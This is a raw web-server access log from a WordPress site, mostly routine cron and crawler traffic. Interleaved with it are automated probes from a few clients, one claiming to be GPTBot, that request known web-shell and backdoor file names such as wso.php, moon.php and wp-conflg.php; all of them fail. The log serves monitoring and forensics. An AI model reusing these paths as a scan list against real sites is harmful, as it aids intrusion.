20.171.207.172 - - [30/Mar/2025:01:24:43 -0400] "GET /wp-admin/includes/class_api.php HTTP/1.1" 404 15291 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
198.54.114.83 - - [30/Mar/2025:01:25:10 -0400] "POST /wp-cron.php?doing_wp_cron=1743312309.8037528991699218750000 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://creative-webstyle.com"
20.171.207.172 - - [30/Mar/2025:01:25:09 -0400] "GET /wp-admin/maint/moon.php HTTP/1.1" 404 15289 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.172 - - [30/Mar/2025:01:25:36 -0400] "GET /wp-includes/ID3/moon.php HTTP/1.1" 404 15293 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
198.54.114.83 - - [30/Mar/2025:01:26:00 -0400] "POST /wp-cron.php?doing_wp_cron=1743312360.3222849369049072265625 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://creative-webstyle.com"
20.171.207.172 - - [30/Mar/2025:01:26:00 -0400] "GET /wp-admin/js/widgets/class.api.php HTTP/1.1" 404 15295 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.172 - - [30/Mar/2025:01:26:26 -0400] "GET /wp-admin/js/widgets/class_api.php HTTP/1.1" 404 15296 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
198.54.114.83 - - [30/Mar/2025:01:26:52 -0400] "POST /wp-cron.php?doing_wp_cron=1743312412.7532389163970947265625 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://creative-webstyle.com"
20.171.207.172 - - [30/Mar/2025:01:26:52 -0400] "GET /wp-admin/images/class.api.php HTTP/1.1" 404 15291 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.172 - - [30/Mar/2025:01:27:18 -0400] "GET /wp-includes/IXR/moon.php HTTP/1.1" 404 15294 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
198.54.114.83 - - [30/Mar/2025:01:27:44 -0400] "POST /wp-cron.php?doing_wp_cron=1743312464.6268429756164550781250 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://creative-webstyle.com"
20.171.207.172 - - [30/Mar/2025:01:27:44 -0400] "GET /wp-admin/includes/atomlib.php HTTP/1.1" 404 15291 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
198.54.114.83 - - [30/Mar/2025:01:28:11 -0400] "POST /wp-cron.php?doing_wp_cron=1743312491.2123410701751708984375 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://creative-webstyle.com"
20.171.207.172 - - [30/Mar/2025:01:28:11 -0400] "GET /wp-includes/certificates/moon.php HTTP/1.1" 404 15300 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.172 - - [30/Mar/2025:01:28:37 -0400] "GET /wp-admin/maint/atomlib.php HTTP/1.1" 404 15291 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
198.54.114.83 - - [30/Mar/2025:01:29:02 -0400] "POST /wp-cron.php?doing_wp_cron=1743312542.6654329299926757812500 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://creative-webstyle.com"
20.171.207.172 - - [30/Mar/2025:01:29:02 -0400] "GET /wp-admin/images/moon.php HTTP/1.1" 404 15288 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.172 - - [30/Mar/2025:01:29:27 -0400] "GET /wp-admin/includes/moon.php HTTP/1.1" 404 15289 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
198.54.114.83 - - [30/Mar/2025:01:29:54 -0400] "POST /wp-cron.php?doing_wp_cron=1743312594.0848979949951171875000 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://creative-webstyle.com"
20.171.207.172 - - [30/Mar/2025:01:29:53 -0400] "GET /assets/class_api.php HTTP/1.1" 404 15290 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.172 - - [30/Mar/2025:01:30:20 -0400] "GET /images/atomlib.php HTTP/1.1" 404 15289 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
198.54.114.83 - - [30/Mar/2025:01:30:46 -0400] "POST /wp-cron.php?doing_wp_cron=1743312646.2460238933563232421875 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://creative-webstyle.com"
20.171.207.172 - - [30/Mar/2025:01:30:46 -0400] "GET /wp-admin/js/widgets/sgd.php HTTP/1.1" 404 15293 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
198.54.114.83 - - [30/Mar/2025:01:31:10 -0400] "POST /wp-cron.php?doing_wp_cron=1743312670.6967608928680419921875 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://creative-webstyle.com"
20.171.207.172 - - [30/Mar/2025:01:31:10 -0400] "GET /wp-admin/js/widgets/moon.php HTTP/1.1" 404 15293 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.172 - - [30/Mar/2025:01:31:36 -0400] "GET /wp-admin/user/class_api.php HTTP/1.1" 404 15291 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
198.54.114.83 - - [30/Mar/2025:01:32:01 -0400] "POST /wp-cron.php?doing_wp_cron=1743312721.1618399620056152343750 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://creative-webstyle.com"
20.171.207.172 - - [30/Mar/2025:01:32:00 -0400] "GET /wp-admin/user/moon.php HTTP/1.1" 404 15288 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.172 - - [30/Mar/2025:01:32:26 -0400] "GET /wp-includes/wso.php HTTP/1.1" 404 15286 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
198.54.114.83 - - [30/Mar/2025:01:32:53 -0400] "POST /wp-cron.php?doing_wp_cron=1743312773.0552120208740234375000 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://creative-webstyle.com"
20.171.207.172 - - [30/Mar/2025:01:32:52 -0400] "GET /apps/admin/view/default/layui/images/face/11.gif HTTP/1.1" 404 15317 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.172 - - [30/Mar/2025:01:33:17 -0400] "GET /common/img/class_api.php HTTP/1.1" 404 15301 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
198.54.114.83 - - [30/Mar/2025:01:33:44 -0400] "POST /wp-cron.php?doing_wp_cron=1743312824.2177839279174804687500 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://creative-webstyle.com"
20.171.207.172 - - [30/Mar/2025:01:33:43 -0400] "GET /public/plugins/Ueditor/dialogs/attachment/fileTypeImages/icon_psd.gif HTTP/1.1" 404 15337 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
198.54.114.83 - - [30/Mar/2025:01:34:03 -0400] "POST /wp-cron.php?doing_wp_cron=1743312842.9431500434875488281250 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://creative-webstyle.com"
45.148.10.237 - - [30/Mar/2025:01:34:02 -0400] "GET /plugins/flow.js HTTP/1.1" 404 15288 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/121.0.0.0"
20.171.207.172 - - [30/Mar/2025:01:34:09 -0400] "GET /bk/index.php HTTP/1.1" 301 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.172 - - [30/Mar/2025:01:34:35 -0400] "GET /images/atomlib.php HTTP/1.1" 404 15289 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
198.54.114.83 - - [30/Mar/2025:01:34:57 -0400] "POST /wp-cron.php?doing_wp_cron=1743312897.7845048904418945312500 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://creative-webstyle.com"
20.171.207.172 - - [30/Mar/2025:01:34:57 -0400] "GET /public/plugins/ckeditor/images/spacer.gif HTTP/1.1" 404 15310 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.172 - - [30/Mar/2025:01:35:21 -0400] "GET /public/plugins/Ueditor/dialogs/attachment/images/alignicon.gif HTTP/1.1" 404 15327 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
198.54.114.83 - - [30/Mar/2025:01:35:45 -0400] "POST /wp-cron.php?doing_wp_cron=1743312945.3283650875091552734375 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://creative-webstyle.com"
20.171.207.172 - - [30/Mar/2025:01:35:45 -0400] "GET /wp-admin/css/atomlib.php HTTP/1.1" 404 15290 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
198.54.114.83 - - [30/Mar/2025:01:36:09 -0400] "POST /wp-cron.php?doing_wp_cron=1743312969.1683120727539062500000 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://creative-webstyle.com"
20.171.207.172 - - [30/Mar/2025:01:36:08 -0400] "GET /common/css/class_api.php HTTP/1.1" 404 15296 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.172 - - [30/Mar/2025:01:36:31 -0400] "GET /wp-admin/css/colors/ectoplasm/load-styles.php HTTP/1.1" 404 15306 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
198.54.114.83 - - [30/Mar/2025:01:36:49 -0400] "POST /wp-cron.php?doing_wp_cron=1743313009.4902760982513427734375 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://creative-webstyle.com"
216.244.66.194 - - [30/Mar/2025:01:36:49 -0400] "GET /gpm-to-lpm/feed/ HTTP/1.1" 200 413 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
20.171.207.172 - - [30/Mar/2025:01:36:54 -0400] "GET /bk/ HTTP/1.1" 404 15279 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
43.156.204.134 - - [30/Mar/2025:01:39:27 -0400] "GET / HTTP/1.1" 200 98430 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
124.222.209.139 - - [30/Mar/2025:01:48:16 -0400] "GET / HTTP/1.1" 200 98430 "-" "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) MicroMessenger Weixin QQ AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.62 XWEB/2692 MMWEBSDK/200901 Mobile Safari/537.36"
198.54.114.83 - - [30/Mar/2025:01:49:14 -0400] "POST /wp-cron.php?doing_wp_cron=1743313753.8810839653015136718750 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://creative-webstyle.com"
213.136.68.157 - - [30/Mar/2025:01:49:09 -0400] "GET //simple.php HTTP/1.1" 301 0 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
213.136.68.157 - - [30/Mar/2025:01:49:14 -0400] "GET /simple.php HTTP/1.1" 404 15284 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
213.136.68.157 - - [30/Mar/2025:01:49:21 -0400] "GET //file.php HTTP/1.1" 301 0 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
213.136.68.157 - - [30/Mar/2025:01:49:22 -0400] "GET /file.php HTTP/1.1" 404 15283 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
213.136.68.157 - - [30/Mar/2025:01:49:33 -0400] "GET //file2.php HTTP/1.1" 301 0 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
213.136.68.157 - - [30/Mar/2025:01:49:34 -0400] "GET /file2.php HTTP/1.1" 404 15283 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
198.54.114.83 - - [30/Mar/2025:01:49:46 -0400] "POST /wp-cron.php?doing_wp_cron=1743313786.0929191112518310546875 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://creative-webstyle.com"
213.136.68.157 - - [30/Mar/2025:01:49:45 -0400] "GET //about.php HTTP/1.1" 301 0 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
213.136.68.157 - - [30/Mar/2025:01:49:46 -0400] "GET /about.php HTTP/1.1" 404 15282 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
198.54.114.83 - - [30/Mar/2025:01:49:53 -0400] "POST /wp-cron.php?doing_wp_cron=1743313793.0281059741973876953125 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://creative-webstyle.com"
213.136.68.157 - - [30/Mar/2025:01:49:52 -0400] "GET //item.php HTTP/1.1" 301 0 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
213.136.68.157 - - [30/Mar/2025:01:49:53 -0400] "GET /item.php HTTP/1.1" 404 15281 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
213.136.68.157 - - [30/Mar/2025:01:50:01 -0400] "GET //autoload_classmap.php HTTP/1.1" 301 0 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
213.136.68.157 - - [30/Mar/2025:01:50:03 -0400] "GET /autoload_classmap.php HTTP/1.1" 404 15290 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
213.136.68.157 - - [30/Mar/2025:01:50:11 -0400] "GET //wp-includes/theme-compat/chosen.php HTTP/1.1" 301 0 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
213.136.68.157 - - [30/Mar/2025:01:50:13 -0400] "GET /wp-includes/theme-compat/chosen.php HTTP/1.1" 404 15297 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
213.136.68.157 - - [30/Mar/2025:01:50:18 -0400] "GET //wp-includes/style-engine/wp-conflg.php HTTP/1.1" 301 0 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
213.136.68.157 - - [30/Mar/2025:01:50:19 -0400] "GET /wp-includes/style-engine/wp-conflg.php HTTP/1.1" 404 15299 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
213.136.68.157 - - [30/Mar/2025:01:50:30 -0400] "GET //zwso.php HTTP/1.1" 301 0 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
213.136.68.157 - - [30/Mar/2025:01:50:31 -0400] "GET /zwso.php HTTP/1.1" 404 15284 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
198.54.114.83 - - [30/Mar/2025:01:50:42 -0400] "POST /wp-cron.php?doing_wp_cron=1743313842.4002470970153808593750 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://creative-webstyle.com"
213.136.68.157 - - [30/Mar/2025:01:50:42 -0400] "GET //wp-includes/pomo/wp-conflg.php HTTP/1.1" 301 0 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
213.136.68.157 - - [30/Mar/2025:01:50:43 -0400] "GET /wp-includes/pomo/wp-conflg.php HTTP/1.1" 404 15295 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
198.54.114.83 - - [30/Mar/2025:01:50:55 -0400] "POST /wp-cron.php?doing_wp_cron=1743313855.9090418815612792968750 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://creative-webstyle.com"
213.136.68.157 - - [30/Mar/2025:01:50:55 -0400] "GET //wp-includes/IXR/chosen.php HTTP/1.1" 301 0 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
213.136.68.157 - - [30/Mar/2025:01:50:56 -0400] "GET /wp-includes/IXR/chosen.php HTTP/1.1" 404 15295 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
213.136.68.157 - - [30/Mar/2025:01:51:08 -0400] "GET //wp-includes/js/chosen.php HTTP/1.1" 301 0 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
213.136.68.157 - - [30/Mar/2025:01:51:09 -0400] "GET /wp-includes/js/chosen.php HTTP/1.1" 404 15292 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
213.136.68.157 - - [30/Mar/2025:01:51:19 -0400] "GET //dropdown.php HTTP/1.1" 301 0 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
213.136.68.157 - - [30/Mar/2025:01:51:20 -0400] "GET /dropdown.php HTTP/1.1" 404 15287 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
213.136.68.157 - - [30/Mar/2025:01:51:30 -0400] "GET //admin.php HTTP/1.1" 301 0 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
213.136.68.157 - - [30/Mar/2025:01:51:31 -0400] "GET /admin.php HTTP/1.1" 404 15283 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
198.54.114.83 - - [30/Mar/2025:01:51:41 -0400] "POST /wp-cron.php?doing_wp_cron=1743313901.2115900516510009765625 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://creative-webstyle.com"
213.136.68.157 - - [30/Mar/2025:01:51:41 -0400] "GET //wp-includes/ID3/wp-conflg.php HTTP/1.1" 301 0 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
213.136.68.157 - - [30/Mar/2025:01:51:42 -0400] "GET /wp-includes/ID3/wp-conflg.php HTTP/1.1" 404 15296 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
198.54.114.83 - - [30/Mar/2025:01:51:49 -0400] "POST /wp-cron.php?doing_wp_cron=1743313909.3894670009613037109375 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://creative-webstyle.com"
213.136.68.157 - - [30/Mar/2025:01:51:49 -0400] "GET //hg.php HTTP/1.1" 301 0 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
213.136.68.157 - - [30/Mar/2025:01:51:51 -0400] "GET /hg.php HTTP/1.1" 404 15281 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
213.136.68.157 - - [30/Mar/2025:01:51:57 -0400] "GET //chosen.php HTTP/1.1" 301 0 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
213.136.68.157 - - [30/Mar/2025:01:51:59 -0400] "GET /chosen.php HTTP/1.1" 404 15285 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
213.136.68.157 - - [30/Mar/2025:01:52:09 -0400] "GET //wp-conflg.php HTTP/1.1" 301 0 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
213.136.68.157 - - [30/Mar/2025:01:52:10 -0400] "GET /wp-conflg.php HTTP/1.1" 404 15285 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
213.136.68.157 - - [30/Mar/2025:01:52:18 -0400] "GET //wp-admin/css/wp-conflg.php HTTP/1.1" 301 0 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
213.136.68.157 - - [30/Mar/2025:01:52:20 -0400] "GET /wp-admin/css/wp-conflg.php HTTP/1.1" 404 15291 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
213.136.68.157 - - [30/Mar/2025:01:52:29 -0400] "GET //wp-includes/certificates/chosen.php HTTP/1.1" 301 0 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
213.136.68.157 - - [30/Mar/2025:01:52:30 -0400] "GET /wp-includes/certificates/chosen.php HTTP/1.1" 404 15300 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
198.54.114.83 - - [30/Mar/2025:01:52:40 -0400] "POST /wp-cron.php?doing_wp_cron=1743313960.6985061168670654296875 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://creative-webstyle.com"
213.136.68.157 - - [30/Mar/2025:01:52:40 -0400] "GET //wp-admin/js/autoload_classmap.php HTTP/1.1" 301 0 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
213.136.68.157 - - [30/Mar/2025:01:52:41 -0400] "GET /wp-admin/js/autoload_classmap.php HTTP/1.1" 404 15296 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
124.222.209.139 - - [30/Mar/2025:01:55:51 -0400] "GET / HTTP/1.1" 200 98430 "-" "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) MicroMessenger Weixin QQ AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.62 XWEB/2692 MMWEBSDK/200901 Mobile Safari/537.36"
51.222.253.3 - - [30/Mar/2025:01:59:48 -0400] "GET / HTTP/1.1" 200 98430 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
196.251.71.229 - - [30/Mar/2025:02:03:08 -0400] "GET / HTTP/1.1" 200 98430 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
198.54.114.83 - - [30/Mar/2025:02:03:11 -0400] "POST /wp-cron.php?doing_wp_cron=1743314591.5908060073852539062500 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://creative-webstyle.com"
196.251.71.229 - - [30/Mar/2025:02:03:08 -0400] "POST /wp-plain.php HTTP/1.1" 404 15236 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
